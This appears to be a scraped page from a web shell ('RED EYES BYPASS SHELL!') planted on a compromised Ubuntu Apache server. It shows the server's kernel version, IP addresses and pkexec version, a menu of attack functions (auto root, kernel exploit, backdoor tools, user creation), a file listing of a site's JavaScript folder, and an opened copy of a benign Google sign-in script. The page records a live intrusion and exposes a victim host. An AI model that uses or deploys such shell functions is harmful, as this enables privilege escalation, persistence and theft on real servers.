Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
autocomplete.js
8.04
KB
-rwxr-xr-x
calendar.js
16.46
KB
-rwxr-xr-x
clock.js
2.76
KB
-rwxr-xr-x
common.js
22.6
KB
-rwxr-xr-x
datalist.js
8.23
KB
-rwxr-xr-x
ddmenu.js
7.72
KB
-rwxr-xr-x
ddpanel.js
2.1
KB
-rwxr-xr-x
dragdrop.js
2.62
KB
-rwxr-xr-x
editinplace.js
2.8
KB
-rwxr-xr-x
facebook.js
2.14
KB
-rwxr-xr-x
gajax.js
139.73
KB
-rwxr-xr-x
gbanner.js
7.88
KB
-rwxr-xr-x
google.js
1.9
KB
-rwxr-xr-x
graphs.js
36.78
KB
-rwxr-xr-x
inputgroup.js
3.37
KB
-rwxr-xr-x
loader.js
5.9
KB
-rwxr-xr-x
multiselect.js
2.61
KB
-rwxr-xr-x
pdpa.js
1.73
KB
-rwxr-xr-x
range.js
9.47
KB
-rwxr-xr-x
select.js
8.28
KB
-rwxr-xr-x
spline.js
5.58
KB
-rwxr-xr-x
table.js
19.77
KB
-rwxr-xr-x
uploads.js
11.4
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : google.js
/** * Google signin Script * * @filesource js/google.js * @link https://www.kotchasan.com/ * @copyright 2018 Goragod.com * @license https://www.kotchasan.com/license/ */ var auth2; function initGooleSignin(google_client_id) { loadJavascript( "apis-google", "https://apis.google.com/js/platform.js?onload=googleSigninLoad" ); window.google_client_id = google_client_id; } function googleSigninLoad() { gapi.load("auth2", function() { auth2 = gapi.auth2.init({ client_id: window.google_client_id + ".apps.googleusercontent.com", cookiepolicy: "single_host_origin" }); }); } function initGoogleButton(button) { if ($E(button)) { window.setTimeout(function() { if (auth2) { auth2.attachClickHandler($E(button), {}, function(googleUser) { var profile = googleUser.getBasicProfile(), q = new Array(); if ($E("token")) { q.push("token=" + $E("token").value); } q.push("id=" + encodeURIComponent(profile.getId())); q.push("name=" + encodeURIComponent(profile.getName())); q.push("image=" + encodeURIComponent(profile.getImageUrl())); q.push("email=" + encodeURIComponent(profile.getEmail())); send(WEB_URL + "index.php/" + ($E("google_action") ? $E("google_action").value : "index/model/gglogin/chklogin"), q.join("&"), ggLoginSubmit); }); } else { initGoogleButton(button); } }, 100); } } function ggLoginSubmit(xhr) { var ds = xhr.responseText.toJSON(); if (ds) { if (ds.alert) { alert(ds.alert); } if (ds.isMember == 1) { if ($E("login_action")) { window.location = $E("login_action").value; } else { window.location = replaceURL({}, { module: 'welcome' }).replace("action=logout", "action=login"); } } } else if (xhr.responseText != "") { console.log(xhr.responseText); } }
Close